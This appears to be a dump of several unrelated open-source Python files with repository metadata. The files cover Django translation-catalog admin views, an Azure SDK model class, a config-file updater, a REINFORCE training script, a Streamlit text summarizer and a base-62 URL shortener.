            raise PermissionDenied
        try:
            self.language = Language.objects.get(name=args[0])
            self.locale = to_locale(self.language.name)
        except Language.DoesNotExist:
            raise Http404
        if settings.LOCALE_PATHS:
            #check if the folder for this language exists and attempt to create it if id does not exist
            self.po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
            if not os.path.exists(self.po_path):
                try:
                    os.makedirs(self.po_path)
                except:
                    self.error = _('Could not create the target folder.')
        else:
            # NOTE(review): when LOCALE_PATHS is empty, self.po_path is never
            # set, so a ?delete request below would raise AttributeError.
            self.error = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
        #delete files if requested
        if request.GET.get('delete', 0):
            for f in os.listdir(self.po_path):
                if f.endswith('.po') or f.endswith('.mo'):
                    os.unlink(os.path.join(self.po_path, f))
        context = self.get_context_data(**kwargs)
        return self.render_to_response(context)
    def get_context_data(self, **kwargs):
        context = super(GenerateTranslationMessagesView, self).get_context_data(**kwargs)
        # Bail out early if get() recorded an error.
        if hasattr(self, 'error') and self.error:
            context['error'] = self.error
            return context
        #locate the current directory
        curr_dir = os.curdir
        # Message domains and the file extensions scanned for each.
        domain_dict = {'django' : ['html','txt'], 'djangojs' : ['js']}
        lang_files = []
        #iterate over the installed applications and copy their po files
        #for this language to the appropriate folder
        for app_name in settings.INSTALLED_APPS:
            mod = import_module(app_name)
            mod_root = os.path.dirname(mod.__file__)
            if not os.path.exists(os.path.join(mod_root, 'locale')):
                continue
            original_path = os.path.join(mod_root, 'locale', to_locale(self.language.name), 'LC_MESSAGES')
            delete_at_the_end = False
            if not os.path.exists(original_path):
                if not app_name.startswith('django.contrib'):
                    try: #try to create language directory for the app
                        os.makedirs(original_path)
                        delete_at_the_end = True
                    except:
                        continue
                else:
                    continue
            if not app_name.startswith('django.contrib'):
                #move original files to a temp file
                for file_ in list(os.listdir(original_path)):
                    if file_.endswith('.po'):
                        shutil.copy(os.path.join(original_path, file_), os.path.join(original_path, 'original-%s' % file_))
                #copy the project-wise files to the appropriate directory
                if not self.request.GET.get('delete', 0):
                    #replace original file with the yawd version
                    #so that it gets updated
                    for f in list(os.listdir(self.po_path)):
                        if f.startswith('%s-' % app_name) and f.endswith('.po'):
                            shutil.copy(os.path.join(self.po_path, f), os.path.join(original_path, f.replace('%s-' % app_name, '')))
                #makemessages excluding the core applications
                os.chdir(mod_root)
                for key, value in domain_dict.items():
                    make_messages(locale=self.locale, domain=key, extensions=handle_extensions(value), verbosity=0)
                os.chdir(curr_dir)
            #iterate over the application po files
            for file_ in list(os.listdir(original_path)):
                if not file_.startswith('original-') and file_.endswith('.po'):
                    original_file_path = os.path.join(original_path, file_)
                    # Namespace the copy with the app name, e.g. 'myapp-django.po'.
                    file_name = '%s-%s' % (app_name, file_)
                    #copy file
                    copy_path = os.path.join(self.po_path, file_name)
                    if self.request.GET.get('delete', 0) or not (app_name.startswith('django.contrib') and os.path.exists(copy_path)):
                        shutil.copy(original_file_path, copy_path)
                        os.chmod(copy_path, 0664)
                    #unlink updated file
                    if not app_name.startswith('django.contrib'):
                        os.unlink(original_file_path)
                    lang_files.append(file_name)
            if not app_name.startswith('django.contrib'):
                if delete_at_the_end:
                    shutil.rmtree(os.path.join(mod_root, 'locale', to_locale(self.language.name)))
                else:
                    for file_ in os.listdir(original_path):
                        #put back the original application files
                        if file_.startswith('original-') and file_.endswith('.po'):
                            shutil.move(os.path.join(original_path, file_), os.path.join(original_path, file_.replace('original-','')))
        #concat all messages in a single .po file for each domain
        for domain in domain_dict:
            file_name = '%s.po' % domain
            uni_django_path = os.path.join(self.po_path, file_name)
            if os.path.exists(uni_django_path):
                os.unlink(uni_django_path)
            source_files = [os.path.join(self.po_path, f) for f in lang_files if f.endswith(file_name)]
            if source_files:
                #merge .po files
                concat_message_files(source_files, uni_django_path)
                #compile django.po
                if not has_bom(uni_django_path):
                    compile_message_file(uni_django_path)
        #reset the cached translation messages so that
        #we do not need to restart the web server
        reset_translations(self.language.name)
        context['lang_files'] = sorted(lang_files)
        return context
class TranslationMessagesView(TemplateView):
    """List the per-application .po files available for one language.

    Requires the `translations.view_translations` permission; URL arg 0 is
    the language name.
    """
    template_name = 'admin/translation_messages.html'
    def get(self, request, *args, **kwargs):
        if not request.user.has_perm('translations.view_translations'):
            raise PermissionDenied
        try:
            self.language = Language.objects.get(name=args[0])
            self.locale = to_locale(self.language.name)
        except Language.DoesNotExist:
            raise Http404
        context = self.get_context_data(**kwargs)
        return self.render_to_response(context)
    def get_context_data(self, **kwargs):
        context = super(TranslationMessagesView, self).get_context_data(**kwargs)
        opts = self.language._meta
        context['title'] = _('Translate Static Messages')
        context['language'] = self.language
        context['opts'] = opts
        #add permission context variables
        context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
        context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
        if not settings.LOCALE_PATHS:
            # Without LOCALE_PATHS there is no unified catalog directory to list.
            context['error'] = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
            return context
        context['lang_files'] = []
        po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
        if os.path.exists(po_path):
            for file_ in os.listdir(po_path):
                # Skip the merged catalogs; list only the per-app files.
                if file_.endswith('.po') and not file_ in ['django.po', 'djangojs.po']:
                    context['lang_files'].append(file_)
            context['lang_files'].sort()
        if not os.path.exists(po_path) or not context['lang_files']:
            context['warning'] = _('The system does not appear to have any translation messages for this language. Please use the "Generate messages" button.')
        return context
class TranslationMessagesEditView(FormView):
    """Admin view for editing one .po translation catalog in a textarea.

    On save the edited contents are written back, the per-app catalogs for
    the same domain are concatenated into a unified django(.js).po, the
    unified catalog is compiled (unless it carries a BOM) and the cached
    gettext translations are reset.
    """
    template_name = 'admin/edit_translation_messages.html'
    form_class = PoFileForm
    success_url = '../'

    def dispatch(self, request, *args, **kwargs):
        """
        Overridden dispatch method to check if user has the right to edit
        the .po file.
        """
        if not request.user.has_perm('translations.edit_translations'):
            raise PermissionDenied
        return super(TranslationMessagesEditView, self).dispatch(request, *args, **kwargs)

    def get_initial(self):
        """
        Attempt to load the .po file and put its contents in the form's
        initial data.

        Raises Http404 when the language is unknown, LOCALE_PATHS is not
        configured, or the file cannot be read.
        """
        try:
            self.language = Language.objects.get(name=self.args[0])
        except Language.DoesNotExist:
            raise Http404
        if settings.LOCALE_PATHS:
            self.po_path = os.path.join(settings.LOCALE_PATHS[0], to_locale(self.language.name), 'LC_MESSAGES')
        else:
            raise Http404
        self.po_file = self.args[1]
        try:
            # fix: context manager closes the handle even when read() fails;
            # the original open/read/close leaked it on error
            with open(os.path.join(self.po_path, self.po_file), 'r') as file_:
                contents = file_.read()
            return { 'po_content' : contents }
        except Exception:
            # fix: narrowed from a bare ``except:`` so SystemExit and
            # KeyboardInterrupt are no longer swallowed
            raise Http404

    def get_context_data(self, **kwargs):
        """Add admin-change-template context (title, permission flags)."""
        context = super(TranslationMessagesEditView, self).get_context_data(**kwargs)
        opts = self.language._meta
        context['title'] = u'%s %s' % (_('Edit'), self.po_file)
        context['language'] = self.language
        context['opts'] = opts
        # permission context variables consumed by the admin template
        context['has_delete_permission'] = False
        context['has_add_permission'] = False
        context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
        context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
        context['change'] = True
        context['is_popup'] = False
        context['save_as'] = False
        return context

    def form_valid(self, form):
        """Persist the edited catalog and rebuild the unified catalog file."""
        try:
            file_path = os.path.join(self.po_path, self.po_file)
            # fix: context manager replaces open/write/close
            with open(file_path, 'w+') as file_:
                file_.write(smart_str(form.cleaned_data['po_content']))
            domain = 'django.po' if self.po_file.endswith('django.po') else 'djangojs.po'
            uni_django_path = os.path.join(self.po_path, domain)
            source_files = []
            # iterate over the installed applications, locate & concat
            # the corresponding global django.po or djangojs.po file
            for app_name in settings.INSTALLED_APPS:
                local_django = os.path.join(self.po_path, '%s-%s' % (app_name, domain))
                if os.path.exists(local_django):
                    source_files.append(local_django)
            concat_message_files(source_files, uni_django_path)
            if not has_bom(uni_django_path):
                compile_message_file(uni_django_path)
            # reset the cached translation messages so that
            # we do not need to restart the web server
            reset_translations(self.language.name)
            messages.add_message(self.request, messages.SUCCESS, _(('The file %(file)s was succesfuly updated.' % { 'file' : self.po_file })))
        except Exception:
            # fix: narrowed from a bare ``except:``
            messages.add_message(self.request, messages.ERROR, _(('The file %(file)s could not be saved.' % { 'file' : self.po_file })))
        # save and continue editing
        if "_continue" in self.request.POST:
            return HttpResponseRedirect('../%s' % self.po_file)
        return super(TranslationMessagesEditView, self).form_valid(form)
|
[
"ppetrid@yawd.eu"
] |
ppetrid@yawd.eu
|
50faf2e04d91afe1be4128df90c192dd546b38fe
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-network/azure/mgmt/network/v2018_06_01/models/application_gateway_probe.py
|
d04d03bf97211b720086089e3307cafdb95580c8
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,616
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayProbe(SubResource):
    """Probe of the application gateway.

    All parameters are optional keyword arguments; any that are not
    supplied are stored as None.

    :param id: Resource ID.
    :param protocol: Protocol used for the probe; possible values are
     'Http' and 'Https'.
    :param host: Host name to send the probe to.
    :param path: Relative path of the probe (starts from '/'); the probe
     is sent to <Protocol>://<host>:<port><path>.
    :param interval: Probing interval in seconds between two consecutive
     probes (1-86400).
    :param timeout: Probe timeout in seconds; the probe is marked failed
     if no valid response is received within it (1-86400).
    :param unhealthy_threshold: Probe retry count; the backend server is
     marked down after this many consecutive failures (1-20).
    :param pick_host_name_from_backend_http_settings: Whether the host
     header should be picked from the backend http settings
     (default False).
    :param min_servers: Minimum number of servers always marked healthy
     (default 0).
    :param match: Criterion for classifying a healthy probe response.
    :param provisioning_state: Provisioning state of the backend http
     settings resource: 'Updating', 'Deleting' or 'Failed'.
    :param name: Name of the probe, unique within an Application Gateway.
    :param etag: Read-only string that changes whenever the resource is
     updated.
    :param type: Type of the resource.
    """

    # Serialization map: python attribute -> wire key and wire type.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'protocol': {'key': 'properties.protocol', 'type': 'str'},
        'host': {'key': 'properties.host', 'type': 'str'},
        'path': {'key': 'properties.path', 'type': 'str'},
        'interval': {'key': 'properties.interval', 'type': 'int'},
        'timeout': {'key': 'properties.timeout', 'type': 'int'},
        'unhealthy_threshold': {'key': 'properties.unhealthyThreshold', 'type': 'int'},
        'pick_host_name_from_backend_http_settings': {'key': 'properties.pickHostNameFromBackendHttpSettings', 'type': 'bool'},
        'min_servers': {'key': 'properties.minServers', 'type': 'int'},
        'match': {'key': 'properties.match', 'type': 'ApplicationGatewayProbeHealthResponseMatch'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationGatewayProbe, self).__init__(**kwargs)
        # Copy every probe property out of kwargs; absent keys become None.
        for attr in ('protocol', 'host', 'path', 'interval', 'timeout',
                     'unhealthy_threshold',
                     'pick_host_name_from_backend_http_settings',
                     'min_servers', 'match', 'provisioning_state',
                     'name', 'etag', 'type'):
            setattr(self, attr, kwargs.get(attr, None))
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
7ea0b2de09aff5bea5badf760e316f5e173859ce
|
70bf8686d8888373d5fd9e484174a165d7d2e8b8
|
/Python/Strings/Text Wrap.py
|
35441d421e6c2df7923894f6751c04ac60899d89
|
[] |
no_license
|
tboztuna/Hackerrank
|
70735da07f239e9e080c00b96e91a03f16f727c6
|
26b16114eb3fb3b9bdb15fb128c00017e1638672
|
refs/heads/master
| 2021-04-29T21:33:17.594166
| 2018-03-05T12:32:53
| 2018-03-05T12:32:53
| 121,618,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
import textwrap
def wrap(string, max_width):
    """Print *string* wrapped to lines of at most *max_width* characters.

    Always returns the empty string (the HackerRank template prints the
    return value; the wrapped text itself is emitted via print here).
    """
    # fix: parenthesized print works under both Python 2 and Python 3;
    # the original ``print expr`` statement form is Python-2 only.
    print(textwrap.fill(string, max_width))
    return ""
if __name__ == '__main__':
    # NOTE: Python 2 only — ``raw_input`` and the print statement below
    # do not exist in Python 3.
    string, max_width = raw_input(), int(raw_input())
    result = wrap(string, max_width)
    print result
|
[
"tolga.boztuna@freebirdairlines.com"
] |
tolga.boztuna@freebirdairlines.com
|
6b8e063df39d1bc4647cc63b5d37bbb741026f94
|
84856442c382b0b670246636d378beb095effa0a
|
/dev_cloud/cc1/pkg/node/usr/sbin/cc1_node_update_config
|
e017f54f299318ea27deee56590d47e9bbbd9034
|
[
"Apache-2.0",
"LicenseRef-scancode-philippe-de-muyter"
] |
permissive
|
Dev-Cloud-Platform/Dev-Cloud
|
f50cc3292245156c4cf55942e4426fda22443fd6
|
b2fb9f4318aeb6dde1e8babca32da527943f1fb4
|
refs/heads/master
| 2020-12-29T02:43:14.022401
| 2017-05-05T07:18:21
| 2017-05-05T07:18:21
| 28,969,864
| 1
| 1
| null | 2015-01-14T16:46:57
| 2015-01-08T14:36:52
|
Python
|
UTF-8
|
Python
| false
| false
| 1,615
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @cond LICENSE
#
# Copyright [2010-2013] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @endcond LICENSE
"""
@author Maciej Nabozny <mn@mnabozny.pl>
"""
import sys
def set_value(key, value):
    """Rewrite /etc/cc1/node/config.py, replacing every line that starts
    with *key* by ``key="value"``; all other lines are kept verbatim.

    Returns 0 on success (used directly as the process exit status).
    """
    # fix: parenthesized print works under Python 2 and 3 alike
    print("NODE: Updating config: %s:%s" % (key, value))
    lines = []
    # fix: context managers close the file even if an exception occurs;
    # the original leaked the handle on error
    with open('/etc/cc1/node/config.py', 'r') as config:
        for line in config.readlines():
            if line[-1] == '\n':
                line = line[:-1]
            # NOTE(review): startswith() also matches keys that are a
            # prefix of another key (e.g. "HOST" matches "HOSTNAME") —
            # confirm config keys are prefix-free
            if line.startswith(key):
                lines.append(key + '="' + str(value) + '"')
            else:
                lines.append(line)
    with open('/etc/cc1/node/config.py', 'w') as config:
        config.write('\n'.join(lines))
    return 0
if __name__ == "__main__":
    try:
        if len(sys.argv) == 3:
            # exit status comes from set_value (0 on success)
            sys.exit(set_value(sys.argv[1], sys.argv[2]))
        else:
            print "Usage: %s [key] new_value" % sys.argv[0]
            sys.exit(1)
    except Exception as e:
        # Python 2 stream-redirect print syntax (stderr)
        print >> sys.stderr, "ERROR: %s" % str(e)
        sys.exit(10)
|
[
"michal.szczygiel@wp.pl"
] |
michal.szczygiel@wp.pl
|
|
336a6cde3aa7072a4a9489b56a37cb431e68c47c
|
1c873df0ce730c318428de0abc436a83b34d07b8
|
/blog/migrations/0001_initial.py
|
15a80777e4b151c939f0c559a7af4f88b275b32f
|
[] |
no_license
|
Perceval4/my-first-blog
|
8f8aea387ff479bb7665e8afd557367b72c8fe9d
|
3daa287f3007790a178e5ffecca19d1eb61531a4
|
refs/heads/master
| 2020-03-25T08:58:40.045003
| 2018-08-05T19:08:48
| 2018-08-05T19:08:48
| 143,641,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 984
|
py
|
# Generated by Django 2.1 on 2018-08-05 11:49
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial blog migration: creates the ``Post`` model."""

    initial = True

    dependencies = [
        # Post.author points at the swappable/configured user model
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"perceval321@gmail.com"
] |
perceval321@gmail.com
|
d862578bb9da5bed1c4f3b517175f68855257486
|
160add72a6907b0967a1249915bc482012dd7130
|
/blog/urls.py
|
998badc7a2ac35e088df0b861ff28af4a96ce2e2
|
[
"MIT"
] |
permissive
|
bencko/test_blog_api
|
b46b7dc21f55897ea7190f9160c3a3a550d797ec
|
5b2c64b6cb54a6e45ef3ab8261372b6040321585
|
refs/heads/main
| 2023-05-02T11:17:04.980376
| 2021-05-24T20:53:33
| 2021-05-24T20:53:33
| 367,986,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
from django.urls import path
from .views import PostCreate, UserPostsView,\
FeedView, SubscribeCreateOrListView,\
SubscribeOperateView, ReadedPostsView
# URL routes for the blog app; paths are relative to the prefix this
# module is included under.
urlpatterns = [
    # create a post
    path(
        '',
        PostCreate.as_view(),
        name='post-create'
    ),
    # feed generation
    path(
        'feed/',
        FeedView.as_view(),
        name='feed-view'
    ),
    # posts of user <pk>
    path(
        '<int:pk>/posts/',
        UserPostsView.as_view(),
        name='user-posts-view'
    ),
    # operate on subscription <pk>
    path(
        'subscribes/<int:pk>/',
        SubscribeOperateView.as_view(),
        name='subscribe-operate-view'
    ),
    # create a subscription or list existing ones
    path(
        'subscribes/',
        SubscribeCreateOrListView.as_view(),
        name='subscribe-create-or-list'
    ),
    # mark posts as read
    path(
        'readed/',
        ReadedPostsView.as_view(),
        name='mark-as-readed'
    ),
]
|
[
"cpaed@yandex.ru"
] |
cpaed@yandex.ru
|
06e2e05fdeafdbbfe6a1accd2104a6c9365ce3df
|
85467153147e81d693a38960d5b5f3304e11e97f
|
/REINFORCE.py
|
89c3c6dadf75b8af87b8c8a59103dc33a1e480bb
|
[] |
no_license
|
asadi8/planning_regularization
|
4cc974fda8b22617105ed09ea5e8390c90af8067
|
c1d145d7551c2cc44563cb8e0b3dc635d4dd958c
|
refs/heads/master
| 2021-01-18T19:00:59.480763
| 2017-03-10T01:31:55
| 2017-03-10T01:31:55
| 84,364,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,888
|
py
|
import numpy,sys
import networkActor
import gym
import model
import math
import utils_k
def initializeForLearn(stepSize, numHidden, activation, hiddenSize):
    """Create the gym environment and the policy network (actor).

    Returns (env, actor, returnPerEpisode) where the last element is an
    empty list used to accumulate per-episode returns.

    NOTE(review): ``stepSize`` is accepted but unused here — it is applied
    later in ``learn`` via ``actor.update``.
    """
    environment = 'ModelBasedAtariFreeway-v0'
    env = gym.make(environment)
    obs = env.reset()  # NOTE(review): the initial observation is discarded
    state_shape = None
    if environment == 'CartPole-v0':
        state_shape = 4
    elif environment == 'Freeway-v0' or environment == "ModelBasedAtariFreeway-v0":
        state_shape = env.observation_space.shape
    # build actor
    actor = networkActor.networkLog(state_shape, env.action_space.n, numHidden, activation, hiddenSize, environment)
    return env, actor, []
def initializeForEpisode(env):
    """Reset *env* and return (initial_obs, rewards, reps, actions, t=0)."""
    initial_obs = env.reset()
    return initial_obs, [], [], [], 0
def interactOneEpisode(env, actor):
    """Run one full episode in *env* using *actor*'s policy.

    Returns (returns, reps, actions, rewards) where ``returns`` are the
    discounted returns computed from the per-step rewards using the
    module-level ``gamma``.
    """
    rep, rewards, reps, actions, t = initializeForEpisode(env)
    # fix: removed a redundant ``reps = []`` (initializeForEpisode already
    # returns an empty list) and a stray per-step debug print of ``t``
    rep = rep.reshape((1,) + rep.shape)  # add a leading batch dimension
    while True:
        action = actor.action_selection(rep)
        rep_prime, r, done, _ = env.step(action)
        rep_prime = rep_prime.reshape((1,) + rep_prime.shape)
        reps.append(rep)
        actions.append(action)
        rewards.append(r)
        rep, t = rep_prime, t + 1
        if done:
            break
    returns = utils_k.rewardToReturn(rewards, gamma)
    return returns, reps, actions, rewards
def REINFORCEUpdate(actor, returns, reps, actions, num_actions, efficient=True):
    """Compute per-parameter REINFORCE gradient estimates for one episode.

    Returns a list (one entry per model weight array) of gradient
    accumulators averaged over the T timesteps. When ``efficient`` is set
    and the episode return is below 0.1, an all-zero gradient list is
    returned without evaluating the network gradient.
    """
    weights = actor.model.get_weights()
    T = len(returns)
    gList = []
    for w in weights:
        gList.append(numpy.zeros_like(w))
    if efficient and returns[0] < 0.1:
        return gList
    reps = numpy.concatenate(reps, axis=0)
    grad = actor.gradient
    gradients = grad([reps])
    for param_index in range(len(weights)):
        grad_param = gradients[param_index]
        # NOTE(review): rows of grad_param appear to be laid out as
        # ``num_actions`` rows per timestep; the row for the action taken
        # at step t is selected below — confirm against networkActor.
        for t, (G_t, phi_t, a_t) in enumerate(zip(returns, reps, actions)):
            gList[param_index] = gList[param_index] + G_t * grad_param[t*num_actions + a_t]
        gList[param_index] = gList[param_index] / T
    return gList
# --- hyperparameters ---
gamma = 0.99999  # discount factor used when converting rewards to returns
# --- hyperparameters ---
def learn(run,
          stepSize, numHidden, maxEpisode, activation, hiddenSize,
          batchEpisodeNumber):
    """Train the actor with REINFORCE for *maxEpisode* episodes.

    Gradients are accumulated per episode and applied every
    ``batchEpisodeNumber`` episodes via ``actor.update``.
    NOTE(review): ``run`` is accepted but unused in this function body.
    """
    env, actor, returnPerEpisode = initializeForLearn(stepSize, numHidden, activation, hiddenSize)
    deltaList = []
    info = []
    for episode in range(maxEpisode):
        print("episode number:", episode)
        # interact in the environment for one episode and store relevant information
        returns, reps, actions, rewards = interactOneEpisode(env, actor)
        print("return:", returns[0])
        info.append((returns, reps, actions, rewards))
        returnPerEpisode.append(returns[0])
        deltaListEpisode = REINFORCEUpdate(actor, returns, reps, actions, env.action_space.n)
        deltaList.append(deltaListEpisode)
        if (episode+1) % batchEpisodeNumber == 0:  # reached the batch episode size
            # update actor by learning, then reset the gradient batch
            actor.update(deltaList, batchEpisodeNumber, stepSize)
            deltaList = []
        utils_k.printLog(episode, returnPerEpisode, frequency=100)
|
[
"Kavosh@Kavoshs-MacBook-Pro.local"
] |
Kavosh@Kavoshs-MacBook-Pro.local
|
149c0e407620ddb45cf8c46a20ccf64962db7cb5
|
09f94c45b2c3c280890865037b0699059bd5a20c
|
/robust_reset.py
|
9bc7a78386e8483118511681299ed80d96ac0dc1
|
[] |
no_license
|
Vivekyy/robust_domain_adaptation
|
0ec0eb81160923e107032df686520f0f9a1d564a
|
48cf56cf4b9dfe365539b8539062a9ad8b60e890
|
refs/heads/main
| 2023-07-10T06:38:47.416346
| 2021-08-06T20:17:23
| 2021-08-06T20:17:23
| 333,889,707
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
py
|
import torch
import os
from net import Net
from utils import setDevice
device = setDevice()  # compute device resolved once at import — presumably cuda/cpu; see utils.setDevice
def reset(modelPath=None):
    """Restore a '_robust' checkpoint from its non-robust counterpart.

    Given e.g. ``prefix_task_arch_robust.pt``, looks for
    ``prefix_task_arch.pt``; if it exists and the user confirms, its
    weights are loaded and written over the robust checkpoint.
    """
    if modelPath is None:
        modelPath = input("Please enter the path for the model you would like to reset: ")
    # Keep the first three underscore-separated pieces (drops "_robust")
    # and re-attach the ".pt" extension.
    parts = modelPath.split('_')
    resetTarget = "%s_%s_%s.pt" % (parts[0], parts[1], parts[2])
    if os.path.exists(resetTarget):
        answer = input("Would you like to reset to %s? " % resetTarget)
        if answer in ("y", "Y"):
            model = Net().to(device)
            model.load_state_dict(torch.load(resetTarget))
            torch.save(model.state_dict(), modelPath)
    else:
        print("No available reset model found")
if __name__ == "__main__":
    # interactive entry point: prompts for the checkpoint path
    reset()
|
[
"vivekyanamadula@gmail.com"
] |
vivekyanamadula@gmail.com
|
d1e03cab1e9cddc4c7b1e28758741b3bc57a95b7
|
a7871ac812ca5e3d40881e1815d0fbaf61df4742
|
/nlp_text_summerizer.py
|
d82ec869da99afc4c8f495161dde4792ad2ea335
|
[] |
no_license
|
debnathtanmoy/Streamlit
|
8163de49050d634b5b987c89887d9439750596b0
|
710bc8d24d5d62f28adf23ebe3947d562a0fa820
|
refs/heads/master
| 2022-09-19T06:43:28.461914
| 2020-06-06T12:44:15
| 2020-06-06T12:44:15
| 268,523,657
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,340
|
py
|
import streamlit as st
from gensim.summarization import summarize
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
import spacy
from spacy import displacy
nlp = spacy.load(('en_core_web_sm'))  # spaCy English model, loaded once at import (unused in the code shown here)
from bs4 import BeautifulSoup
from urllib.request import urlopen
def sumy_summarizer(docx):
    """Summarize *docx* into its top 3 LexRank sentences, joined by spaces."""
    parsed = PlaintextParser.from_string(docx, Tokenizer("english"))
    top_sentences = LexRankSummarizer()(parsed.document, 3)
    return ' '.join(str(sentence) for sentence in top_sentences)
def main():
    """Streamlit entry point: a sidebar selects the activity to run."""
    st.title("Summaryzer and Entity Checker")
    activities = ["Summarize","NER Checker","NER For URL"]
    choice = st.sidebar.selectbox("Select Activity",activities)
    # NOTE(review): only 'Summarize' is handled below; the two NER
    # activities render nothing — confirm whether that is intentional.
    if choice == 'Summarize':
        st.subheader("Summarize Document")
        raw_text = st.text_area("Enter Text Here","Type Here")
        summarizer_type = st.selectbox("Summarizer Type",["Gensim","Sumy Lex Rank"])
        if st.button("Summarize"):
            if summarizer_type == "Gensim":
                summary_result = summarize(raw_text)
            elif summarizer_type == "Sumy Lex Rank":
                summary_result = sumy_summarizer(raw_text)
            st.write(summary_result)
if __name__ == '__main__':
    # executed by ``streamlit run`` or direct invocation
    main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
200a81f58579323116fcf06d8ac860193ba85b33
|
c954904d3a3259f0bee4bc3942998c30f4714e68
|
/shortener/shorturl/__init__.py
|
841083c46d1e89eca6a52cddcb079e6658197c16
|
[] |
no_license
|
Alodhaib/django-shortener-example
|
9443e51191086fa1321468eb3fdefa137c25e330
|
d037c913ed18e0a7b24865b7f4f5aaf68df2cca3
|
refs/heads/master
| 2021-01-24T10:06:40.965556
| 2013-05-11T16:01:13
| 2013-05-11T16:01:13
| 69,673,280
| 0
| 0
| null | 2016-09-30T14:22:22
| 2016-09-30T14:22:22
| null |
UTF-8
|
Python
| false
| false
| 2,822
|
py
|
#!/usr/bin/env python
#
# Converts any integer into a base [BASE] number. I have chosen 62
# as it is meant to represent the integers using all the alphanumeric
# characters, [no special characters] = {0..9}, {A..Z}, {a..z}
#
# I plan on using this to shorten the representation of possibly long ids,
# a la url shortenters
#
# saturate() takes the base 62 key, as a string, and turns it back into an integer
# dehydrate() takes an integer and turns it into the base 62 string
#
import math
import sys
# Base-62 alphabet layout: digits 0-9 map to 0-9, 'A'-'Z' to 10-35,
# 'a'-'z' to 36-61. The offsets convert between ord() values and digit
# values.
BASE = 62
UPPERCASE_OFFSET = 55  # ord('A') - 10
LOWERCASE_OFFSET = 61  # ord('a') - 36
DIGIT_OFFSET = 48      # ord('0')

def true_ord(char):
    """
    Turns a digit [char] in character representation
    from the number system with base [BASE] into an integer.

    Raises ValueError for any character outside 0-9A-Za-z.
    """
    # fix: restrict to ASCII '0'-'9' explicitly; str.isdigit() also accepts
    # Unicode digit characters whose ord() offsets would yield wrong values
    if '0' <= char <= '9':
        return ord(char) - DIGIT_OFFSET
    elif 'A' <= char <= 'Z':
        return ord(char) - UPPERCASE_OFFSET
    elif 'a' <= char <= 'z':
        return ord(char) - LOWERCASE_OFFSET
    else:
        raise ValueError("%s is not a valid character" % char)
def true_chr(integer):
    """
    Turns an integer [integer] into digit in base [BASE]
    as a character representation.
    """
    if integer < 10:
        return chr(integer + DIGIT_OFFSET)
    if 10 <= integer <= 35:
        return chr(integer + UPPERCASE_OFFSET)
    if 36 <= integer < 62:
        return chr(integer + LOWERCASE_OFFSET)
    raise ValueError("%d is not a valid integer in the range of base %d" % (integer, BASE))
def saturate(key):
    """
    Turn the base [BASE] number [key] into an integer.
    """
    # fix: use integer exponentiation. math.pow returns a float, which
    # loses precision once BASE**idx exceeds 2**53 (keys ~9+ characters).
    int_sum = 0
    for idx, char in enumerate(reversed(key)):
        int_sum += true_ord(char) * BASE ** idx
    return int_sum
